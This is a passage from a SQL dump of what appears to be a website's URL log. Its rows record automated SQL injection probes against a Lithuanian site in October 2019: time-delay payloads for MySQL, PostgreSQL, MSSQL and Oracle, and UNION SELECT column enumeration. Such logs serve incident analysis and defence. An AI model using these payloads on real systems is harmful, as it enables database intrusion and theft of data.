DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(108)||CHR(79)||CHR(88),5) FROM DUAL--&view=article&id=305','','','',1,0,'2019-10-17 12:10:49','0000-00-00 00:00:00'),(3134,'http://infotytuvenai.lt/index.php/lt/?option=com_content\');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(108)||CHR(79)||CHR(88),5) FROM DUAL--&view=article&id=305','','','',1,0,'2019-10-17 12:10:49','0000-00-00 00:00:00'),(3135,'http://infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(108)||CHR(79)||CHR(88),5) FROM DUAL--&view=article&id=305','','','',1,0,'2019-10-17 12:10:50','0000-00-00 00:00:00'),(3136,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(108)||CHR(79)||CHR(88),5) FROM DUAL--&view=article&id=305','','','',1,0,'2019-10-17 12:10:51','0000-00-00 00:00:00'),(3137,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND SLEEP(5) AND (2887=2887&view=article&id=305','','','',1,0,'2019-10-17 12:10:51','0000-00-00 00:00:00'),(3138,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND SLEEP(5)&view=article&id=305','','','',1,0,'2019-10-17 12:10:52','0000-00-00 00:00:00'),(3139,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND SLEEP(5) AND (\'xhPs\'=\'xhPs&view=article&id=305','','','',1,0,'2019-10-17 12:10:52','0000-00-00 00:00:00'),(3140,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND SLEEP(5) AND \'jdvm\'=\'jdvm&view=article&id=305','','','',1,0,'2019-10-17 12:10:53','0000-00-00 00:00:00'),(3141,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND SLEEP(5) AND \'%\'=\'&view=article&id=305','','','',1,0,'2019-10-17 12:10:54','0000-00-00 00:00:00'),(3142,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND SLEEP(5)-- KDPJ&view=article&id=305','','','',1,0,'2019-10-17 12:10:54','0000-00-00 00:00:00'),(3143,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 9925=(SELECT 9925 FROM PG_SLEEP(5)) AND (1187=1187&view=article&id=305','','','',1,0,'2019-10-17 12:10:55','0000-00-00 00:00:00'),(3144,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 9925=(SELECT 9925 FROM PG_SLEEP(5))&view=article&id=305','','','',1,0,'2019-10-17 12:10:56','0000-00-00 00:00:00'),(3145,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND 9925=(SELECT 9925 FROM PG_SLEEP(5)) AND (\'hHUP\'=\'hHUP&view=article&id=305','','','',1,0,'2019-10-17 12:10:56','0000-00-00 00:00:00'),(3146,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND 9925=(SELECT 9925 FROM PG_SLEEP(5)) AND \'JiDx\'=\'JiDx&view=article&id=305','','','',1,0,'2019-10-17 12:10:57','0000-00-00 00:00:00'),(3147,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 9925=(SELECT 9925 FROM PG_SLEEP(5)) AND \'%\'=\'&view=article&id=305','','','',1,0,'2019-10-17 12:10:58','0000-00-00 00:00:00'),(3148,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 9925=(SELECT 9925 FROM PG_SLEEP(5))-- ArUC&view=article&id=305','','','',1,0,'2019-10-17 12:10:58','0000-00-00 00:00:00'),(3149,'http://infotytuvenai.lt/index.php/lt/?option=com_content) WAITFOR DELAY \'0:0:5\' AND (6874=6874&view=article&id=305','','','',1,0,'2019-10-17 12:10:59','0000-00-00 00:00:00'),(3150,'http://infotytuvenai.lt/index.php/lt/?option=com_content WAITFOR DELAY \'0:0:5\'&view=article&id=305','','','',1,0,'2019-10-17 12:11:00','0000-00-00 00:00:00'),(3151,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') WAITFOR DELAY \'0:0:5\' AND (\'uyiU\'=\'uyiU&view=article&id=305','','','',1,0,'2019-10-17 12:11:01','0000-00-00 00:00:00'),(3152,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' WAITFOR DELAY \'0:0:5\' AND \'tDtr\'=\'tDtr&view=article&id=305','','','',1,0,'2019-10-17 12:11:02','0000-00-00 00:00:00'),(3153,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' WAITFOR DELAY \'0:0:5\' AND \'%\'=\'&view=article&id=305','','','',1,0,'2019-10-17 12:11:02','0000-00-00 00:00:00'),(3154,'http://infotytuvenai.lt/index.php/lt/?option=com_content WAITFOR DELAY \'0:0:5\'-- bKut&view=article&id=305','','','',1,0,'2019-10-17 12:11:03','0000-00-00 00:00:00'),(3155,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 7952=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(101)||CHR(114),5) AND (7471=7471&view=article&id=305','','','',1,0,'2019-10-17 12:11:04','0000-00-00 00:00:00'),(3156,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 7952=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(101)||CHR(114),5)&view=article&id=305','','','',1,0,'2019-10-17 12:11:05','0000-00-00 00:00:00'),(3157,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND 7952=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(101)||CHR(114),5) AND (\'UOdp\'=\'UOdp&view=article&id=305','','','',1,0,'2019-10-17 12:11:05','0000-00-00 00:00:00'),(3158,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND 7952=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(101)||CHR(114),5) AND \'uddZ\'=\'uddZ&view=article&id=305','','','',1,0,'2019-10-17 12:11:06','0000-00-00 00:00:00'),(3159,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 7952=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(101)||CHR(114),5) AND \'%\'=\'&view=article&id=305','','','',1,0,'2019-10-17 12:11:07','0000-00-00 00:00:00'),(3160,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 7952=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(101)||CHR(114),5)-- PERw&view=article&id=305','','','',1,0,'2019-10-17 12:11:08','0000-00-00 00:00:00'),(3161,'http://infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- Khuw&view=article&id=305','','','',1,0,'2019-10-17 12:11:09','0000-00-00 00:00:00'),(3162,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- hxcC&view=article&id=305','','','',1,0,'2019-10-17 12:11:09','0000-00-00 00:00:00'),(3163,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- VBkK&view=article&id=305','','','',1,0,'2019-10-17 12:11:10','0000-00-00 00:00:00'),(3164,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- LWue&view=article&id=305','','','',1,0,'2019-10-17 12:11:11','0000-00-00 00:00:00'),(3165,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- knDJ&view=article&id=305','','','',1,0,'2019-10-17 12:11:12','0000-00-00 00:00:00'),(3166,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- qizT&view=article&id=305','','','',1,0,'2019-10-17 12:11:13','0000-00-00 00:00:00'),(3167,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- VJKq&view=article&id=305','','','',1,0,'2019-10-17 12:11:13','0000-00-00 00:00:00'),(3168,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- AIjk&view=article&id=305','','','',1,0,'2019-10-17 12:11:14','0000-00-00 00:00:00'),(3169,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iyNM&view=article&id=305','','','',1,0,'2019-10-17 12:11:15','0000-00-00 00:00:00'),(3170,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Ixel&view=article&id=305','','','',1,0,'2019-10-17 12:11:16','0000-00-00 00:00:00'),(3171,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- puOP&view=article&id=305','','','',1,0,'2019-10-17 12:11:16','0000-00-00 00:00:00'),(3172,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- DLhE&view=article&id=305','','','',1,0,'2019-10-17 12:11:17','0000-00-00 00:00:00'),(3173,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- wHCP&view=article&id=305','','','',1,0,'2019-10-17 12:11:17','0000-00-00 00:00:00'),(3174,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- tRkC&view=article&id=305','','','',1,0,'2019-10-17 12:11:18','0000-00-00 00:00:00'),(3175,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- oVaX&view=article&id=305','','','',1,0,'2019-10-17 12:11:19','0000-00-00 00:00:00'),(3176,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- nCmy&view=article&id=305','','','',1,0,'2019-10-17 12:11:19','0000-00-00 00:00:00'),(3177,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- xBJk&view=article&id=305','','','',1,0,'2019-10-17 12:11:20','0000-00-00 00:00:00'),(3178,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- wQhU&view=article&id=305','','','',1,0,'2019-10-17 12:11:21','0000-00-00 00:00:00'),(3179,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UxAs&view=article&id=305','','','',1,0,'2019-10-17 12:11:22','0000-00-00 00:00:00'),(3180,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XosQ&view=article&id=305','','','',1,0,'2019-10-17 12:11:22','0000-00-00 00:00:00'),(3181,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vXMs&view=article&id=305','','','',1,0,'2019-10-17 12:11:23','0000-00-00 00:00:00'),(3182,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cPzo&view=article&id=305','','','',1,0,'2019-10-17 12:11:24','0000-00-00 00:00:00'),(3183,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') ORDER BY 1-- iJOZ&view=article&id=305','','','',1,0,'2019-10-17 12:11:25','0000-00-00 00:00:00'),(3184,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL-- BYhe&view=article&id=305','','','',1,0,'2019-10-17 12:11:25','0000-00-00 00:00:00'),(3185,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL-- bCAZ&view=article&id=305','','','',1,0,'2019-10-17 12:11:26','0000-00-00 00:00:00'),(3186,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL-- Rsah&view=article&id=305','','','',1,0,'2019-10-17 12:11:27','0000-00-00 00:00:00'),(3187,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL-- txTj&view=article&id=305','','','',1,0,'2019-10-17 12:11:27','0000-00-00 00:00:00'),(3188,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- YTjY&view=article&id=305','','','',1,0,'2019-10-17 12:11:28','0000-00-00 00:00:00'),(3189,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- PIin&view=article&id=305','','','',1,0,'2019-10-17 12:11:29','0000-00-00 00:00:00'),(3190,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BenC&view=article&id=305','','','',1,0,'2019-10-17 12:11:30','0000-00-00 00:00:00'),(3191,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nnYL&view=article&id=305','','','',1,0,'2019-10-17 12:11:30','0000-00-00 00:00:00'),(3192,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DZgt&view=article&id=305','','','',1,0,'2019-10-17 12:11:31','0000-00-00 00:00:00'),(3193,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KWbT&view=article&id=305','','','',1,0,'2019-10-17 12:11:32','0000-00-00 00:00:00'),(3194,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' ORDER BY 1-- iSdB&view=article&id=305','','','',1,0,'2019-10-17 12:11:32','0000-00-00 00:00:00'),(3195,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL-- GxoB&view=article&id=305','','','',1,0,'2019-10-17 12:11:33','0000-00-00 00:00:00'),(3196,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL-- oJlv&view=article&id=305','','','',1,0,'2019-10-17 12:11:33','0000-00-00 00:00:00'),(3197,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL-- ypln&view=article&id=305','','','',1,0,'2019-10-17 12:11:34','0000-00-00 00:00:00'),(3198,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL-- bLYP&view=article&id=305','','','',1,0,'2019-10-17 12:11:35','0000-00-00 00:00:00'),(3199,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- znDG&view=article&id=305','','','',1,0,'2019-10-17 12:11:35','0000-00-00 00:00:00'),(3200,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- zHWn&view=article&id=305','','','',1,0,'2019-10-17 12:11:36','0000-00-00 00:00:00'),(3201,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rtLo&view=article&id=305','','','',1,0,'2019-10-17 12:11:37','0000-00-00 00:00:00'),(3202,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iUPP&view=article&id=305','','','',1,0,'2019-10-17 12:11:37','0000-00-00 00:00:00'),(3203,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Cflo&view=article&id=305','','','',1,0,'2019-10-17 12:11:38','0000-00-00 00:00:00'),(3204,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JJPf&view=article&id=305','','','',1,0,'2019-10-17 12:11:39','0000-00-00 00:00:00'),(3205,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' ORDER BY 1-- XpXT&view=article&id=305','','','',1,0,'2019-10-17 12:11:40','0000-00-00 00:00:00'),(3206,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL-- kXmF&view=article&id=305','','','',1,0,'2019-10-17 12:11:40','0000-00-00 00:00:00'),(3207,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL-- QEco&view=article&id=305','','','',1,0,'2019-10-17 12:11:41','0000-00-00 00:00:00'),(3208,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL-- tvtf&view=article&id=305','','','',1,0,'2019-10-17 12:11:42','0000-00-00 00:00:00'),(3209,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL-- bVRS&view=article&id=305','','','',1,0,'2019-10-17 12:11:43','0000-00-00 00:00:00'),(3210,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- lRSo&view=article&id=305','','','',1,0,'2019-10-17 12:11:43','0000-00-00 00:00:00'),(3211,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- YpGp&view=article&id=305','','','',1,0,'2019-10-17 12:11:44','0000-00-00 00:00:00'),(3212,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- OXvh&view=article&id=305','','','',1,0,'2019-10-17 12:11:45','0000-00-00 00:00:00'),(3213,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kbQI&view=article&id=305','','','',1,0,'2019-10-17 12:11:45','0000-00-00 00:00:00'),(3214,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KvtA&view=article&id=305','','','',1,0,'2019-10-17 12:11:46','0000-00-00 00:00:00'),(3215,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GYZw&view=article&id=305','','','',1,0,'2019-10-17 12:11:48','0000-00-00 00:00:00'),(3216,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- Awdu&view=article&id=305','','','',1,0,'2019-10-17 12:11:48','0000-00-00 00:00:00'),(3217,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- uFVQ&view=article&id=305','','','',1,0,'2019-10-17 12:11:49','0000-00-00 00:00:00'),(3218,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- QZui&view=article&id=305','','','',1,0,'2019-10-17 12:11:49','0000-00-00 00:00:00'),(3219,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- UGgu&view=article&id=305','','','',1,0,'2019-10-17 12:11:50','0000-00-00 00:00:00'),(3220,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- RXpW&view=article&id=305','','','',1,0,'2019-10-17 12:11:50','0000-00-00 00:00:00'),(3221,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- LkBG&view=article&id=305','','','',1,0,'2019-10-17 12:11:51','0000-00-00 00:00:00'),(3222,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- diDB&view=article&id=305','','','',1,0,'2019-10-17 12:11:52','0000-00-00 00:00:00'),(3223,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FCRn&view=article&id=305','','','',1,0,'2019-10-17 12:11:52','0000-00-00 00:00:00'),(3224,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Fuii&view=article&id=305','','','',1,0,'2019-10-17 12:11:53','0000-00-00 00:00:00'),(3225,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rQlU&view=article&id=305','','','',1,0,'2019-10-17 12:11:53','0000-00-00 00:00:00'),(3226,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jaGT&view=article&id=305','','','',1,0,'2019-10-17 12:11:54','0000-00-00 00:00:00'),(3227,'http://infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1#&view=article&id=305','','','',1,0,'2019-10-17 12:11:54','0000-00-00 00:00:00'),(3228,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:55','0000-00-00 00:00:00'),(3229,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:55','0000-00-00 00:00:00'),(3230,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:56','0000-00-00 00:00:00'),(3231,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:56','0000-00-00 00:00:00'),(3232,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:57','0000-00-00 00:00:00'),(3233,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:57','0000-00-00 00:00:00'),(3234,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:58','0000-00-00 00:00:00'),(3235,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:59','0000-00-00 00:00:00'),(3236,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:11:59','0000-00-00 00:00:00'),(3237,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:00','0000-00-00 00:00:00'),(3238,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1#&view=article&id=305','','','',2,0,'2019-10-17 12:12:00','0000-00-00 00:00:00'),(3239,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:00','0000-00-00 00:00:00'),(3240,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:01','0000-00-00 00:00:00'),(3241,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:02','0000-00-00 00:00:00'),(3242,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:02','0000-00-00 00:00:00'),(3243,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:03','0000-00-00 00:00:00'),(3244,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:03','0000-00-00 00:00:00'),(3245,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:04','0000-00-00 00:00:00'),(3246,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:04','0000-00-00 00:00:00'),(3247,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:05','0000-00-00 00:00:00'),(3248,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2019-10-17 12:12:06','0000-00-00 00:00:00'),(3249,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') ORDER BY 1#&view=article&id=305','','','',1,0,'2019-10-17 12:12:06','0000-00-00 00:00:00'),(3250,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:07','0000-00-00 00:00:00'),(3251,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:07','0000-00-00 00:00:00'),(3252,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:08','0000-00-00 00:00:00'),(3253,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:09','0000-00-00 00:00:00'),(3254,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:09','0000-00-00 00:00:00'),(3255,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:10','0000-00-00 00:00:00'),(3256,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:11','0000-00-00 00:00:00'),(3257,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:11','0000-00-00 00:00:00'),(3258,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:12','0000-00-00 00:00:00'),(3259,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:12','0000-00-00 00:00:00'),(3260,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' ORDER BY 1#&view=article&id=305','','','',1,0,'2019-10-17 12:12:13','0000-00-00 00:00:00'),(3261,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:13','0000-00-00 00:00:00'),(3262,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:14','0000-00-00 00:00:00'),(3263,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:14','0000-00-00 00:00:00'),(3264,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:15','0000-00-00 00:00:00'),(3265,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:15','0000-00-00 00:00:00'),(3266,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:16','0000-00-00 00:00:00'),(3267,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:16','0000-00-00 00:00:00'),(3268,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT 